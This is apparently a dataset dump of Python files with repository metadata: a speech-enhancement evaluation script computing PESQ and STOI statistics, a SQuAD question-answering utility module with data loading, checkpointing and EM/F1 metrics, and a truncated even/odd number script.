te_losses.append(dict['te_loss'])
iters.append(dict['iter'])
# Plot
# line_tr, = plt.plot(tr_losses, c='b', label="Train")
# line_te, = plt.plot(te_losses, c='r', label="Test")
# plt.axis([0, len(iters), 0, max(tr_losses)])
# plt.xlabel("Iterations")
# plt.ylabel("Loss")
# plt.legend(handles=[line_tr, line_te])
# plt.xticks(np.arange(len(iters)), iters)
# plt.show()
def calculate_pesq(args):
"""Calculate PESQ of all enhaced speech.
Args:
workspace: str, path of workspace.
speech_dir: str, path of clean speech.
te_snr: float, testing SNR.
"""
# Remove already existed file.
data_type = args.data_type
speech_dir = "mini_data/test_speech"
f = "{0:<16} {1:<16} {2:<16}"
print(f.format("0", "Noise", "PESQ"))
f1 = open(data_type + '_pesq_results.csv', 'w')
f1.write("%s\t%s\n"%("audio_id", "PESQ"))
# Calculate PESQ of all enhaced speech.
if data_type=="DM":
enh_speech_dir = os.path.join("workspace", "enh_wavs", "test", "mixdb")
elif data_type=="IRM":
enh_speech_dir = os.path.join("workspace", "enh_wavs", "test", "mask_mixdb")
elif data_type=="CRN":
enh_speech_dir = os.path.join("workspace", "enh_wavs", "test", "crn_mixdb")
elif data_type=="PHASE":
enh_speech_dir = os.path.join("workspace", "enh_wavs", "test", "phase_spec_clean_mixdb")
elif data_type=="VOLUME":
enh_speech_dir = os.path.join("workspace", "enh_wavs", "test", "volume_mixdb")
elif data_type=="NOISE":
enh_speech_dir = os.path.join("workspace" ,'mixed_audios','spectrogram','test','mixdb')
names = os.listdir(enh_speech_dir)
for (cnt, na) in enumerate(names):
enh_path = os.path.join(enh_speech_dir, na)
enh_audio, fs = soundfile.read(enh_path)
speech_na = na.split('.')[0]
speech_path = os.path.join(speech_dir, "%s.WAV" % speech_na)
speech_audio, fs = soundfile.read(speech_path)
#alpha = 1. / np.max(np.abs(speech_audio))
#speech_audio *=alpha
pesq_ = pypesq(16000, speech_audio, enh_audio, 'wb')
print(f.format(cnt, na, pesq_))
f1.write("%s\t%f\n"%(na, pesq_))
# Call executable PESQ tool.
#cmd = ' '.join(["./pesq", speech_path, enh_path, "+16000"])
#os.system(cmd)
os.system("mv %s_pesq_results.csv ./pesq_result/%s_pesq_results.csv"%(data_type, data_type))
def get_stats(args):
"""Calculate stats of PESQ.
"""
data_type = args.data_type
pesq_path = "./pesq_result/"+ data_type+ "_pesq_results.csv"
with open(pesq_path, 'rb') as f:
reader = csv.reader(f, delimiter='\t')
lis = list(reader)
pesq_dict = {}
for i1 in xrange(1, len(lis) - 1):
li = lis[i1]
na = li[0]
pesq = float(li[1])
noise_type = na.split('.')[1]
if noise_type not in pesq_dict.keys():
pesq_dict[noise_type] = [pesq]
else:
pesq_dict[noise_type].append(pesq)
out_csv_path ='./pesq_result/'+ data_type +'_pesq_differentnoise.csv'
csv_file = open(out_csv_path, 'w')
avg_list, std_list = [], []
f = "{0:<16} {1:<16}"
print(f.format("Noise", "PESQ"))
csv_file.write("%s\t%s\n"%("Noise", "PESQ"))
print("---------------------------------")
csv_file.write("----------------\t-----------------\n")
for noise_type in pesq_dict.keys():
pesqs = pesq_dict[noise_type]
avg_pesq = np.mean(pesqs)
std_pesq = np.std(pesqs)
avg_list.append(avg_pesq)
std_list.append(std_pesq)
print(f.format(noise_type, "%.2f +- %.2f" % (avg_pesq, std_pesq)))
csv_file.write("%s\t%s\n"%(noise_type, "%.2f +- %.2f" % (avg_pesq, std_pesq)))
print("---------------------------------")
csv_file.write("----------------\t-----------------\n")
print(f.format("Avg.", "%.2f +- %.2f" % (np.mean(avg_list), np.mean(std_list))))
csv_file.write("%s\t%s\n"%("Avg.", "%.2f +- %.2f" % (np.mean(avg_list), np.mean(std_list))))
csv_file.close()
def get_snr_stats(args):
data_type = args.data_type
pesq_path = os.path.join("pesq_result", data_type + "_pesq_results.csv")
with open(pesq_path, 'rb') as f:
reader = csv.reader(f, delimiter='\t')
pesq_lis = list(reader)
pesq_lis[0].append("SNR")
pesq_title = pesq_lis[0]
pesq_lis = pesq_lis[:-1]
csv_path = os.path.join("workspace", "mixture_csvs", "test_1hour_even.csv")
with open(csv_path, 'rb') as f:
reader = csv.reader(f, delimiter='\t')
csv_lis = list(reader)
count = 0
for csv_name in csv_lis[1:]:
if data_type=="NOISE":
csv_na = csv_name[0].split(".")[0] + "." + csv_name[1].split(".")[0]+ "."+csv_name[-1] + "db.wav"
else:
csv_na = csv_name[0].split(".")[0] + "." + csv_name[1].split(".")[0]+ "."+csv_name[-1] + "db.enh.wav"
for pesq_name in pesq_lis[1:]:
if csv_na == pesq_name[0]:
count+=1
pesq_name.append(csv_name[-1])
break
pesq_dict = {}
for i1 in xrange(1, len(pesq_lis)):
li = pesq_lis[i1]
na = li[0]
pesq = float(li[1][0:4])
snr = float(li[-1])
snr_key = snr
if snr_key not in pesq_dict.keys():
pesq_dict[snr_key] = [pesq]
else:
pesq_dict[snr_key].append(pesq)
out_csv_path = os.path.join( "pesq_result", data_type + "_snr_results.csv")
create_folder(os.path.dirname(out_csv_path))
csv_file = open(out_csv_path, 'w')
avg_list, std_list = [], []
sample_sum = 0
f = "{0:<16} {1:<16} {2:<16}"
print(f.format("SNR", "PESQ", "SAMPLE_NUM"))
csv_file.write("%s\t%s\t%s\n"%("SNR", "PESQ", "SAMPLE_NUM"))
csv_file.flush()
print("---------------------------------")
for snr_type in sorted(pesq_dict.keys()):
pesqs = pesq_dict[snr_type]
sample_num = len(pesqs)
sample_sum+=sample_num
avg_pesq = np.mean(pesqs)
std_pesq = np.std(pesqs)
avg_list.append(avg_pesq)
std_list.append(std_pesq)
print(f.format(snr_type, "%.2f +- %.2f" % (avg_pesq, std_pesq), sample_num))
csv_file.write("%s\t%s\t%s\n"%(snr_type, "%.2f +- %.2f" % (avg_pesq, std_pesq), sample_num))
csv_file.flush()
print("---------------------------------")
print(f.format("Avg.", "%.2f +- %.2f" % (np.mean(avg_list), np.mean(std_list)), sample_sum))
csv_file.write("%s\t%s\t%s\n"%("Avg.", "%.2f +- %.2f" % (np.mean(avg_list), np.mean(std_list)), "%d"%sample_sum))
csv_file.close()
def calculate_stoi(args):
workspace = "workspace"
speech_dir = "mini_data/test_speech"
# Calculate PESQ of all enhaced speech.
enh_speech_dir = os.path.join(workspace, "enh_wavs", "test", "mixdb")
#enh_speech_dir = "/data00/wangjinchao/sednn-master/mixture2clean_dnn/workspace/mixed_audios/spectrogram/test/mixdb"
# enh_speech_dir = os.path.join(workspace ,'mixed_audios','spectrogram','test','mixdb')
names = os.listdir(enh_speech_dir)
f = open("IRM_stoi.txt", "w")
f.write("%s\t%s\n"%("speech_id", "stoi"))
f.flush()
for (cnt, na) in enumerate(names):
print(cnt, na)
enh_path = os.path.join(enh_speech_dir, na)
speech_na = na.split('.')[0]
speech_path = os.path.join(speech_dir, "%s.WAV" % speech_na)
speech_audio, fs = read_audio(speech_path, 16000)
enhance_audio, fs = read_audio(enh_path, 16000)
if len(speech_audio)>len(enhance_audio):
speech_audio = speech_audio[:len(enhance_audio)]
else:
enhance_audio = enhance_audio[:len(speech_audio)]
stoi_value = stoi(speech_audio, enhance_audio, fs, extended = False)
f.write("%s\t%f\n"%(na, stoi_value))
f.flush()
f.close()
def get_stoi_stats(args):
stoi_path = "./stoi_result/IRM_stoi.txt"
with open(stoi_path, 'rb') as f:
reader = csv.reader(f, delimiter='\t')
lis = list(reader)
stoi_dict = {}
for i1 in xrange(1, len(lis) - 1):
li = lis[i1]
na = li[0]
stoi = float(li[1])
noise_type = na.split('.')[1]
if noise_type not in stoi_dict.keys():
stoi_dict[noise_type] = [stoi]
else:
stoi_dict[noise_type].append(stoi)
#out_csv_path ='./stoi_result/gvdm_enhance.csv'
#csv_file = open(out_csv_path, 'w')
avg_list, std_list = [], []
f = "{0:<16} {1:<16}"
print(f.format("Noise", "STOI"))
#csv_file.write("%s\t%s\n"%("Noise", "stoi"))
print("---------------------------------")
#csv_file.write("----------------\t-----------------\n")
for noise_type in stoi_dict.keys():
stois = stoi_dict[noise_type]
avg_stoi = np.mean(stois)
std_stoi = np.std(stois)
avg_list.append(avg_stoi)
std_list.append(std_stoi)
print(f.format(noise_type, "%.5f +- %.5f" % (avg_stoi, std_stoi)))
#csv_file.write("%s\t%s\n"%(noise_type, "%.2f +- %.2f" % (avg_stoi, std_stoi)))
print("---------------------------------")
#csv_file.write("----------------\t-----------------\n")
print(f.format("Avg.", "%.2f +- %.2f" % (np.mean(avg_list), np.mean(std_list))))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(dest='mode')
parser_plot_training_stat = subparsers.add_parser('plot_training_stat')
parser_plot_training_stat.add_argument('--workspace', type=str, required=True)
parser_plot_training_stat.add_argument('--tr_snr', type=float, required=True)
parser_plot_training_stat.add_argument('--bgn_iter', type=int, required=True)
parser_plot_training_stat.add_argument('--fin_iter', type=int, required=True)
parser_plot_training_stat.add_argument('--interval_iter', type=int, required=True)
parser_calculate_pesq = subparsers.add_parser('calculate_pesq')
parser_calculate_pesq.add_argument('--data_type', type=str, required=True)
parser_get_stats = subparsers.add_parser('get_stats')
parser_get_stats.add_argument('--data_type', type=str, required=True)
parser_get_snr_stats = subparsers.add_parser('get_snr_stats')
parser_get_snr_stats.add_argument('--data_type', type=str, required=True)
args = parser.parse_args()
if args.mode == 'plot_training_stat':
plot_training_stat(args)
elif args.mode == 'calculate_pesq':
calculate_pesq(args)
elif args.mode == 'get_stats':
get_stats(args)
elif args.mode == 'get_snr_stats':
get_snr_stats(args)
else:
raise Exception("Error!")
| [
"[email protected]"
] | |
a23451e561311fe8fd81476b96702f9bc83a0710 | aa18fb4bb13b6499ae9b1f669758d0ea326c1921 | /util.py | c901283bc804ccdb170cc460fd329c3edf4b2eef | [] | no_license | kaushikData/DoCAI | 8d144a1a6dc2adf5429389ee83aacae4498ab7a5 | e48ffbf9545f84f2426e5154ff626e94ae33f62f | refs/heads/master | 2020-12-18T12:58:28.280599 | 2020-01-24T11:21:57 | 2020-01-24T11:21:57 | 235,391,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,395 | py |
import logging
import os
import queue
import re
import shutil
import string
import torch
import torch.nn.functional as F
import torch.utils.data as data
import tqdm
import numpy as np
import ujson as json
from collections import Counter
class SQuAD(data.Dataset):
"""Stanford Question Answering Dataset (SQuAD).
Each item in the dataset is a tuple with the following entries (in order):
- context_idxs: Indices of the words in the context.
Shape (context_len,).
- context_char_idxs: Indices of the characters in the context.
Shape (context_len, max_word_len).
- question_idxs: Indices of the words in the question.
Shape (question_len,).
- question_char_idxs: Indices of the characters in the question.
Shape (question_len, max_word_len).
- y1: Index of word in the context where the answer begins.
-1 if no answer.
- y2: Index of word in the context where the answer ends.
-1 if no answer.
- id: ID of the example.
Args:
data_path (str): Path to .npz file containing pre-processed dataset.
use_v2 (bool): Whether to use SQuAD 2.0 questions. Otherwise only use SQuAD 1.1.
"""
def __init__(self, data_path, use_v2=True):
super(SQuAD, self).__init__()
dataset = np.load(data_path)
self.context_idxs = torch.from_numpy(dataset['context_idxs']).long()
self.context_char_idxs = torch.from_numpy(dataset['context_char_idxs']).long()
self.question_idxs = torch.from_numpy(dataset['ques_idxs']).long()
self.question_char_idxs = torch.from_numpy(dataset['ques_char_idxs']).long()
self.y1s = torch.from_numpy(dataset['y1s']).long()
self.y2s = torch.from_numpy(dataset['y2s']).long()
if use_v2:
# SQuAD 2.0: Use index 0 for no-answer token (token 1 = OOV)
batch_size, c_len, w_len = self.context_char_idxs.size()
ones = torch.ones((batch_size, 1), dtype=torch.int64)
self.context_idxs = torch.cat((ones, self.context_idxs), dim=1)
self.question_idxs = torch.cat((ones, self.question_idxs), dim=1)
ones = torch.ones((batch_size, 1, w_len), dtype=torch.int64)
self.context_char_idxs = torch.cat((ones, self.context_char_idxs), dim=1)
self.question_char_idxs = torch.cat((ones, self.question_char_idxs), dim=1)
self.y1s += 1
self.y2s += 1
# SQuAD 1.1: Ignore no-answer examples
self.ids = torch.from_numpy(dataset['ids']).long()
self.valid_idxs = [idx for idx in range(len(self.ids))
if use_v2 or self.y1s[idx].item() >= 0]
def __getitem__(self, idx):
idx = self.valid_idxs[idx]
example = (self.context_idxs[idx],
self.context_char_idxs[idx],
self.question_idxs[idx],
self.question_char_idxs[idx],
self.y1s[idx],
self.y2s[idx],
self.ids[idx])
return example
def __len__(self):
return len(self.valid_idxs)
def collate_fn(examples):
"""Create batch tensors from a list of individual examples returned
by `SQuAD.__getitem__`. Merge examples of different length by padding
all examples to the maximum length in the batch.
Args:
examples (list): List of tuples of the form (context_idxs, context_char_idxs,
question_idxs, question_char_idxs, y1s, y2s, ids).
Returns:
examples (tuple): Tuple of tensors (context_idxs, context_char_idxs, question_idxs,
question_char_idxs, y1s, y2s, ids). All of shape (batch_size, ...), where
the remaining dimensions are the maximum length of examples in the input.
Adapted from:
https://github.com/yunjey/seq2seq-dataloader
"""
def merge_0d(scalars, dtype=torch.int64):
return torch.tensor(scalars, dtype=dtype)
def merge_1d(arrays, dtype=torch.int64, pad_value=0):
lengths = [(a != pad_value).sum() for a in arrays]
padded = torch.zeros(len(arrays), max(lengths), dtype=dtype)
for i, seq in enumerate(arrays):
end = lengths[i]
padded[i, :end] = seq[:end]
return padded
def merge_2d(matrices, dtype=torch.int64, pad_value=0):
heights = [(m.sum(1) != pad_value).sum() for m in matrices]
widths = [(m.sum(0) != pad_value).sum() for m in matrices]
padded = torch.zeros(len(matrices), max(heights), max(widths), dtype=dtype)
for i, seq in enumerate(matrices):
height, width = heights[i], widths[i]
padded[i, :height, :width] = seq[:height, :width]
return padded
# Group by tensor type
context_idxs, context_char_idxs, \
question_idxs, question_char_idxs, \
y1s, y2s, ids = zip(*examples)
# Merge into batch tensors
context_idxs = merge_1d(context_idxs)
context_char_idxs = merge_2d(context_char_idxs)
question_idxs = merge_1d(question_idxs)
question_char_idxs = merge_2d(question_char_idxs)
y1s = merge_0d(y1s)
y2s = merge_0d(y2s)
ids = merge_0d(ids)
return (context_idxs, context_char_idxs,
question_idxs, question_char_idxs,
y1s, y2s, ids)
class AverageMeter:
"""Keep track of average values over time.
Adapted from:
> https://github.com/pytorch/examples/blob/master/imagenet/main.py
"""
def __init__(self):
self.avg = 0
self.sum = 0
self.count = 0
def reset(self):
"""Reset meter."""
self.__init__()
def update(self, val, num_samples=1):
"""Update meter with new value `val`, the average of `num` samples.
Args:
val (float): Average value to update the meter with.
num_samples (int): Number of samples that were averaged to
produce `val`.
"""
self.count += num_samples
self.sum += val * num_samples
self.avg = self.sum / self.count
class EMA:
"""Exponential moving average of model parameters.
Args:
model (torch.nn.Module): Model with parameters whose EMA will be kept.
decay (float): Decay rate for exponential moving average.
"""
def __init__(self, model, decay):
self.decay = decay
self.shadow = {}
self.original = {}
# Register model parameters
for name, param in model.named_parameters():
if param.requires_grad:
self.shadow[name] = param.data.clone()
def __call__(self, model, num_updates):
decay = min(self.decay, (1.0 + num_updates) / (10.0 + num_updates))
for name, param in model.named_parameters():
if param.requires_grad:
assert name in self.shadow
new_average = \
(1.0 - decay) * param.data + decay * self.shadow[name]
self.shadow[name] = new_average.clone()
def assign(self, model):
"""Assign exponential moving average of parameter values to the
respective parameters.
Args:
model (torch.nn.Module): Model to assign parameter values.
"""
for name, param in model.named_parameters():
if param.requires_grad:
assert name in self.shadow
self.original[name] = param.data.clone()
param.data = self.shadow[name]
def resume(self, model):
"""Restore original parameters to a model. That is, put back
the values that were in each parameter at the last call to `assign`.
Args:
model (torch.nn.Module): Model to assign parameter values.
"""
for name, param in model.named_parameters():
if param.requires_grad:
assert name in self.shadow
param.data = self.original[name]
class CheckpointSaver:
"""Class to save and load model checkpoints.
Save the best checkpoints as measured by a metric value passed into the
`save` method. Overwrite checkpoints with better checkpoints once
`max_checkpoints` have been saved.
Args:
save_dir (str): Directory to save checkpoints.
max_checkpoints (int): Maximum number of checkpoints to keep before
overwriting old ones.
metric_name (str): Name of metric used to determine best model.
maximize_metric (bool): If true, best checkpoint is that which maximizes
the metric value passed in via `save`. Otherwise, best checkpoint
minimizes the metric.
log (logging.Logger): Optional logger for printing information.
"""
def __init__(self, save_dir, max_checkpoints, metric_name,
maximize_metric=False, log=None):
super(CheckpointSaver, self).__init__()
self.save_dir = save_dir
self.max_checkpoints = max_checkpoints
self.metric_name = metric_name
self.maximize_metric = maximize_metric
self.best_val = None
self.ckpt_paths = queue.PriorityQueue()
self.log = log
self._print('Saver will {}imize {}...'
.format('max' if maximize_metric else 'min', metric_name))
def is_best(self, metric_val):
"""Check whether `metric_val` is the best seen so far.
Args:
metric_val (float): Metric value to compare to prior checkpoints.
"""
if metric_val is None:
# No metric reported
return False
if self.best_val is None:
# No checkpoint saved yet
return True
return ((self.maximize_metric and self.best_val < metric_val)
or (not self.maximize_metric and self.best_val > metric_val))
def _print(self, message):
"""Print a message if logging is enabled."""
if self.log is not None:
self.log.info(message)
def save(self, step, model, metric_val, device):
"""Save model parameters to disk.
Args:
step (int): Total number of examples seen during training so far.
model (torch.nn.DataParallel): Model to save.
metric_val (float): Determines whether checkpoint is best so far.
device (torch.device): Device where model resides.
"""
ckpt_dict = {
'model_name': model.__class__.__name__,
'model_state': model.cpu().state_dict(),
'step': step
}
model.to(device)
checkpoint_path = os.path.join(self.save_dir,
'step_{}.pth.tar'.format(step))
torch.save(ckpt_dict, checkpoint_path)
self._print('Saved checkpoint: {}'.format(checkpoint_path))
if self.is_best(metric_val):
# Save the best model
self.best_val = metric_val
best_path = os.path.join(self.save_dir, 'best.pth.tar')
shutil.copy(checkpoint_path, best_path)
self._print('New best checkpoint at step {}...'.format(step))
# Add checkpoint path to priority queue (lowest priority removed first)
if self.maximize_metric:
priority_order = metric_val
else:
priority_order = -metric_val
self.ckpt_paths.put((priority_order, checkpoint_path))
# Remove a checkpoint if more than max_checkpoints have been saved
if self.ckpt_paths.qsize() > self.max_checkpoints:
_, worst_ckpt = self.ckpt_paths.get()
try:
os.remove(worst_ckpt)
self._print('Removed checkpoint: {}'.format(worst_ckpt))
except OSError:
# Avoid crashing if checkpoint has been removed or protected
pass
def load_model(model, checkpoint_path, gpu_ids, return_step=True):
"""Load model parameters from disk.
Args:
model (torch.nn.DataParallel): Load parameters into this model.
checkpoint_path (str): Path to checkpoint to load.
gpu_ids (list): GPU IDs for DataParallel.
return_step (bool): Also return the step at which checkpoint was saved.
Returns:
model (torch.nn.DataParallel): Model loaded from checkpoint.
step (int): Step at which checkpoint was saved. Only if `return_step`.
"""
device = 'cuda:{}'.format(gpu_ids[0]) if gpu_ids else 'cpu'
ckpt_dict = torch.load(checkpoint_path, map_location=device)
# Build model, load parameters
model.load_state_dict(ckpt_dict['model_state'])
if return_step:
step = ckpt_dict['step']
return model, step
return model
def get_available_devices():
"""Get IDs of all available GPUs.
Returns:
device (torch.device): Main device (GPU 0 or CPU).
gpu_ids (list): List of IDs of all GPUs that are available.
"""
gpu_ids = []
if torch.cuda.is_available():
gpu_ids += [gpu_id for gpu_id in range(torch.cuda.device_count())]
device = torch.device('cuda:{}'.format(gpu_ids[0]))
torch.cuda.set_device(device)
else:
device = torch.device('cpu')
return device, gpu_ids
def masked_softmax(logits, mask, dim=-1, log_softmax=False):
"""Take the softmax of `logits` over given dimension, and set
entries to 0 wherever `mask` is 0.
Args:
logits (torch.Tensor): Inputs to the softmax function.
mask (torch.Tensor): Same shape as `logits`, with 0 indicating
positions that should be assigned 0 probability in the output.
dim (int): Dimension over which to take softmax.
log_softmax (bool): Take log-softmax rather than regular softmax.
E.g., some PyTorch functions such as `F.nll_loss` expect log-softmax.
Returns:
probs (torch.Tensor): Result of taking masked softmax over the logits.
"""
mask = mask.type(torch.float32)
masked_logits = mask * logits + (1 - mask) * -1e30
softmax_fn = F.log_softmax if log_softmax else F.softmax
probs = softmax_fn(masked_logits, dim)
return probs
def visualize(tbx, pred_dict, eval_path, step, split, num_visuals):
"""Visualize text examples to TensorBoard.
Args:
tbx (tensorboardX.SummaryWriter): Summary writer.
pred_dict (dict): dict of predictions of the form id -> pred.
eval_path (str): Path to eval JSON file.
step (int): Number of examples seen so far during training.
split (str): Name of data split being visualized.
num_visuals (int): Number of visuals to select at random from preds.
"""
if num_visuals <= 0:
return
if num_visuals > len(pred_dict):
num_visuals = len(pred_dict)
visual_ids = np.random.choice(list(pred_dict), size=num_visuals, replace=False)
with open(eval_path, 'r') as eval_file:
eval_dict = json.load(eval_file)
for i, id_ in enumerate(visual_ids):
pred = pred_dict[id_] or 'N/A'
example = eval_dict[str(id_)]
question = example['question']
context = example['context']
answers = example['answers']
gold = answers[0] if answers else 'N/A'
tbl_fmt = ('- **Question:** {}\n'
+ '- **Context:** {}\n'
+ '- **Answer:** {}\n'
+ '- **Prediction:** {}')
tbx.add_text(tag='{}/{}_of_{}'.format(split, i + 1, num_visuals),
text_string=tbl_fmt.format(question, context, gold, pred),
global_step=step)
def save_preds(preds, save_dir, file_name='predictions.csv'):
"""Save predictions `preds` to a CSV file named `file_name` in `save_dir`.
Args:
preds (list): List of predictions each of the form (id, start, end),
where id is an example ID, and start/end are indices in the context.
save_dir (str): Directory in which to save the predictions file.
file_name (str): File name for the CSV file.
Returns:
save_path (str): Path where CSV file was saved.
"""
# Validate format
if (not isinstance(preds, list)
or any(not isinstance(p, tuple) or len(p) != 3 for p in preds)):
raise ValueError('preds must be a list of tuples (id, start, end)')
# Make sure predictions are sorted by ID
preds = sorted(preds, key=lambda p: p[0])
# Save to a CSV file
save_path = os.path.join(save_dir, file_name)
np.savetxt(save_path, np.array(preds), delimiter=',', fmt='%d')
return save_path
def get_save_dir(base_dir, name, training, id_max=100):
"""Get a unique save directory by appending the smallest positive integer
`id < id_max` that is not already taken (i.e., no dir exists with that id).
Args:
base_dir (str): Base directory in which to make save directories.
name (str): Name to identify this training run. Need not be unique.
training (bool): Save dir. is for training (determines subdirectory).
id_max (int): Maximum ID number before raising an exception.
Returns:
save_dir (str): Path to a new directory with a unique name.
"""
for uid in range(1, id_max):
subdir = 'train' if training else 'test'
save_dir = os.path.join(base_dir, subdir, '{}-{:02d}'.format(name, uid))
if not os.path.exists(save_dir):
os.makedirs(save_dir)
return save_dir
raise RuntimeError('Too many save directories created with the same name. \
Delete old save directories or use another name.')
def get_logger(log_dir, name):
"""Get a `logging.Logger` instance that prints to the console
and an auxiliary file.
Args:
log_dir (str): Directory in which to create the log file.
name (str): Name to identify the logs.
Returns:
logger (logging.Logger): Logger instance for logging events.
"""
class StreamHandlerWithTQDM(logging.Handler):
"""Let `logging` print without breaking `tqdm` progress bars.
See Also:
> https://stackoverflow.com/questions/38543506
"""
def emit(self, record):
try:
msg = self.format(record)
tqdm.tqdm.write(msg)
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
# Create logger
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
# Log everything (i.e., DEBUG level and above) to a file
log_path = os.path.join(log_dir, 'log.txt')
file_handler = logging.FileHandler(log_path)
file_handler.setLevel(logging.DEBUG)
# Log everything except DEBUG level (i.e., INFO level and above) to console
console_handler = StreamHandlerWithTQDM()
console_handler.setLevel(logging.INFO)
# Create format for the logs
file_formatter = logging.Formatter('[%(asctime)s] %(message)s',
datefmt='%m.%d.%y %H:%M:%S')
file_handler.setFormatter(file_formatter)
console_formatter = logging.Formatter('[%(asctime)s] %(message)s',
datefmt='%m.%d.%y %H:%M:%S')
console_handler.setFormatter(console_formatter)
# add the handlers to the logger
logger.addHandler(file_handler)
logger.addHandler(console_handler)
return logger
def torch_from_json(path, dtype=torch.float32):
"""Load a PyTorch Tensor from a JSON file.
Args:
path (str): Path to the JSON file to load.
dtype (torch.dtype): Data type of loaded array.
Returns:
tensor (torch.Tensor): Tensor loaded from JSON file.
"""
with open(path, 'r') as fh:
array = np.array(json.load(fh))
tensor = torch.from_numpy(array).type(dtype)
return tensor
def discretize(p_start, p_end, max_len=15, no_answer=False):
"""Discretize soft predictions to get start and end indices.
Choose the pair `(i, j)` of indices that maximizes `p1[i] * p2[j]`
subject to `i <= j` and `j - i + 1 <= max_len`.
Args:
p_start (torch.Tensor): Soft predictions for start index.
Shape (batch_size, context_len).
p_end (torch.Tensor): Soft predictions for end index.
Shape (batch_size, context_len).
max_len (int): Maximum length of the discretized prediction.
I.e., enforce that `preds[i, 1] - preds[i, 0] + 1 <= max_len`.
no_answer (bool): Treat 0-index as the no-answer prediction. Consider
a prediction no-answer if `preds[0, 0] * preds[0, 1]` is greater
than the probability assigned to the max-probability span.
Returns:
start_idxs (torch.Tensor): Hard predictions for start index.
Shape (batch_size,)
end_idxs (torch.Tensor): Hard predictions for end index.
Shape (batch_size,)
"""
if p_start.min() < 0 or p_start.max() > 1 \
or p_end.min() < 0 or p_end.max() > 1:
raise ValueError('Expected p_start and p_end to have values in [0, 1]')
# Compute pairwise probabilities
p_start = p_start.unsqueeze(dim=2)
p_end = p_end.unsqueeze(dim=1)
p_joint = torch.matmul(p_start, p_end) # (batch_size, c_len, c_len)
# Restrict to pairs (i, j) such that i <= j <= i + max_len - 1
c_len, device = p_start.size(1), p_start.device
is_legal_pair = torch.triu(torch.ones((c_len, c_len), device=device))
is_legal_pair -= torch.triu(torch.ones((c_len, c_len), device=device),
diagonal=max_len)
if no_answer:
# Index 0 is no-answer
p_no_answer = p_joint[:, 0, 0].clone()
is_legal_pair[0, :] = 0
is_legal_pair[:, 0] = 0
else:
p_no_answer = None
p_joint *= is_legal_pair
# Take pair (i, j) that maximizes p_joint
max_in_row, _ = torch.max(p_joint, dim=2)
max_in_col, _ = torch.max(p_joint, dim=1)
start_idxs = torch.argmax(max_in_row, dim=-1)
end_idxs = torch.argmax(max_in_col, dim=-1)
if no_answer:
# Predict no-answer whenever p_no_answer > max_prob
max_prob, _ = torch.max(max_in_col, dim=-1)
start_idxs[p_no_answer > max_prob] = 0
end_idxs[p_no_answer > max_prob] = 0
return start_idxs, end_idxs
def convert_tokens(eval_dict, qa_id, y_start_list, y_end_list, no_answer):
"""Convert predictions to tokens from the context.
Args:
eval_dict (dict): Dictionary with eval info for the dataset. This is
used to perform the mapping from IDs and indices to actual text.
qa_id (int): List of QA example IDs.
y_start_list (list): List of start predictions.
y_end_list (list): List of end predictions.
no_answer (bool): Questions can have no answer. E.g., SQuAD 2.0.
Returns:
pred_dict (dict): Dictionary index IDs -> predicted answer text.
sub_dict (dict): Dictionary UUIDs -> predicted answer text (submission).
"""
pred_dict = {}
sub_dict = {}
for qid, y_start, y_end in zip(qa_id, y_start_list, y_end_list):
context = eval_dict[str(qid)]["context"]
spans = eval_dict[str(qid)]["spans"]
uuid = eval_dict[str(qid)]["uuid"]
if no_answer and (y_start == 0 or y_end == 0):
pred_dict[str(qid)] = ''
sub_dict[uuid] = ''
else:
if no_answer:
y_start, y_end = y_start - 1, y_end - 1
start_idx = spans[y_start][0]
end_idx = spans[y_end][1]
pred_dict[str(qid)] = context[start_idx: end_idx]
sub_dict[uuid] = context[start_idx: end_idx]
return pred_dict, sub_dict
def metric_max_over_ground_truths(metric_fn, prediction, ground_truths):
if not ground_truths:
return metric_fn(prediction, '')
scores_for_ground_truths = []
for ground_truth in ground_truths:
score = metric_fn(prediction, ground_truth)
scores_for_ground_truths.append(score)
return max(scores_for_ground_truths)
def eval_dicts(gold_dict, pred_dict, no_answer):
avna = f1 = em = total = 0
for key, value in pred_dict.items():
total += 1
ground_truths = gold_dict[key]['answers']
prediction = value
em += metric_max_over_ground_truths(compute_em, prediction, ground_truths)
f1 += metric_max_over_ground_truths(compute_f1, prediction, ground_truths)
if no_answer:
avna += compute_avna(prediction, ground_truths)
eval_dict = {'EM': 100. * em / total,
'F1': 100. * f1 / total}
if no_answer:
eval_dict['AvNA'] = 100. * avna / total
return eval_dict
def compute_avna(prediction, ground_truths):
"""Compute answer vs. no-answer accuracy."""
return float(bool(prediction) == bool(ground_truths))
# All methods below this line are from the official SQuAD 2.0 eval script
# https://worksheets.codalab.org/rest/bundles/0x6b567e1cf2e041ec80d7098f031c5c9e/contents/blob/
def normalize_answer(s):
"""Convert to lowercase and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
regex = re.compile(r'\b(a|an|the)\b', re.UNICODE)
return re.sub(regex, ' ', text)
def white_space_fix(text):
return ' '.join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return ''.join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def get_tokens(s):
if not s:
return []
return normalize_answer(s).split()
def compute_em(a_gold, a_pred):
return int(normalize_answer(a_gold) == normalize_answer(a_pred))
def compute_f1(a_gold, a_pred):
gold_toks = get_tokens(a_gold)
pred_toks = get_tokens(a_pred)
common = Counter(gold_toks) & Counter(pred_toks)
num_same = sum(common.values())
if len(gold_toks) == 0 or len(pred_toks) == 0:
# If either is no-answer, then F1 is 1 if they agree, 0 otherwise
return int(gold_toks == pred_toks)
if num_same == 0:
return 0
precision = 1.0 * num_same / len(pred_toks)
recall = 1.0 * num_same / len(gold_toks)
f1 = (2 * precision * recall) / (precision + recall)
return f1
| [
"[email protected]"
] | |
06fd170031d6d6565c42dd89088f4689b1a53e92 | c5e92c7d4adb261b891ce0994556c8873e94216f | /kdk.py | a3c973a88566ac804ee140f5a7ae21107f3feaf4 | [] | no_license | kamrudeen007/guvi | b4b8faadfaad381be3bb2c2b8b175cfa2ad1d072 | 8c5abaca6510b996b0a307f1a0d9d366ab314fed | refs/heads/master | 2020-04-21T01:18:55.598550 | 2019-02-05T10:09:21 | 2019-02-05T10:09:21 | 169,220,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | num = int(input("Enter any number: "))
flag = num%2
if flag == 0:
print(num, "is an even number")
elif flag == 1:
